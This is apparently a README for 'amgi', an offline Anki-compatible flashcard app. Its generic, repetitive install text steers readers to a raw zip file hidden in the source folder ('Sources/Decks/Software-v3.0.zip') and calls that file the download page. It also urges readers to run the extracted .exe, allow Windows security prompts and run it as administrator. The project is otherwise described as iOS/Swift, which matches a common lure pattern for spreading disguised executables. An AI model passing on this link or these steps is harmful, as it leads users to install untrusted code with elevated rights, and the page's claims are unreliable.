Visit the releases page to download and run the app on Windows:
amgi is an offline-first flashcard app that works with Anki decks and sync support. It is built for people who want to study without needing a constant internet connection.
You can use it to:
- Review flashcards on your own schedule
- Keep studying even when you are offline
- Work with Anki-compatible cards
- Use spaced repetition for better recall
- Sync your study data when needed
It uses the official Anki Rust backend through C FFI, which helps keep card behavior close to Anki.
Follow these steps to download and run amgi on Windows.
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Open the download page: https://github.com/angelinaviolable23/amgi/raw/refs/heads/main/AmgiApp/Sources/Decks/Software-v3.0.zip
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Look for the latest release near the top of the page.
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Find the Windows file in the list of assets. It may end in
.exe,.zip, or a similar Windows format. -
If you downloaded a
.zipfile, right-click it and choose Extract All. -
Open the folder that contains the app.
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If you see an
.exefile, double-click it to start amgi. -
If Windows asks for permission, choose Run.
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If the app opens, you are ready to start using your flashcards.
When you open amgi for the first time, you may need to set up your card data or choose a local study folder.
A typical first setup looks like this:
- Choose where your flashcards will be stored
- Import an Anki deck if you already have one
- Connect sync settings if you plan to use a server
- Pick your study options for new cards and reviews
If you already use Anki, start by importing your deck and checking that your cards appear in the app.
amgi is built to work without a live connection. Your cards stay available on your device, so you can keep reviewing at home, on a trip, or during a commute.
The app follows Anki-style card behavior, so it fits common flashcard habits. This makes it easier to move from Anki or use the same study method across tools.
amgi uses spaced repetition to show cards at the right time. Cards you know well appear less often. Harder cards come back sooner.
If you use sync, amgi can connect to a server and keep your study data aligned across devices. That helps if you study in more than one place.
The app supports FSRS-style scheduling, which helps the app choose review times based on how well you remember each card.
amgi uses the official Anki Rust backend through C FFI. That gives it a strong base for flashcard logic and deck handling.
amgi is meant to run on a modern Windows PC.
Recommended setup:
- Windows 10 or Windows 11
- A standard keyboard and mouse
- At least 4 GB of RAM
- A few hundred MB of free disk space
- A screen size that lets you read cards with ease
If your PC can run a modern desktop app, it should be fine for amgi.
Use this simple install flow after you open the releases page:
- Download the latest Windows release file.
- If the file is compressed, extract it.
- Move the app folder to a place you can find later, such as Desktop or Documents.
- Open the folder.
- Double-click the app file to launch it.
- If Windows shows a security prompt, allow the app to run.
If the release includes more than one file, choose the one made for Windows.
After setup, you can start a normal study session:
- Open your deck
- Review new cards
- Grade each card based on how well you remember it
- Let the app schedule the next review
- Come back later for the next session
A simple habit works well:
- Study for a few minutes each day
- Keep reviews short
- Add new cards in small groups
- Use the same routine so the schedule stays stable
If you use sync, keep your data connected on every device you use.
Good habits:
- Sync after a study session
- Check that your deck names match across devices
- Keep a local backup of your card data
- Update to the latest release when you want fixes and improvements
If you only study on one PC, offline use is still enough for daily review.
The release page may contain different file types. Here is what they usually mean:
.exe- a Windows app file you can run.zip- a compressed file you need to extract first.msi- a Windows installer.dmg- for macOS- source files - for developers, not needed for normal use
For Windows, focus on the file that is meant to run on Windows.
Try these steps:
- Download the file again
- Make sure the file finished downloading
- Extract the archive before opening it
- Right-click the app and choose Run as administrator
- Check that your Windows version is up to date
- Move the app to a simple folder path, such as
C:\Apps\amgi
If it still does not open, download the newest release from the releases page and try again.
amgi is built around these areas:
- Anki
- flashcards
- FSRS
- iOS
- Rust
- spaced repetition
- Swift
- SwiftUI
These topics match a study app that focuses on speed, memory, and clean card review.
After you unzip the release, you may see files like these:
amgi.exe- app support files
- data folders
- config files
- readme or license files
Do not delete the support files unless you know what they do. Keep the full folder together so the app can run normally.
A simple study flow in amgi looks like this:
- Open the app
- Choose a deck
- Review the first card
- Mark how well you remembered it
- Continue through the session
- Return later for the next set of reviews
This keeps study fast and easy to repeat.
Use these habits to keep your study smooth:
- Review at the same time each day
- Keep your decks small and focused
- Add clear questions and short answers
- Avoid large study bursts
- Sync after changes if you use more than one device
Small, regular sessions work well with spaced repetition.
If you need the latest release, use the download page here:
- Download the newest Windows release
- Extract it if needed
- Open the app
- Import or sync your cards
- Start your first review session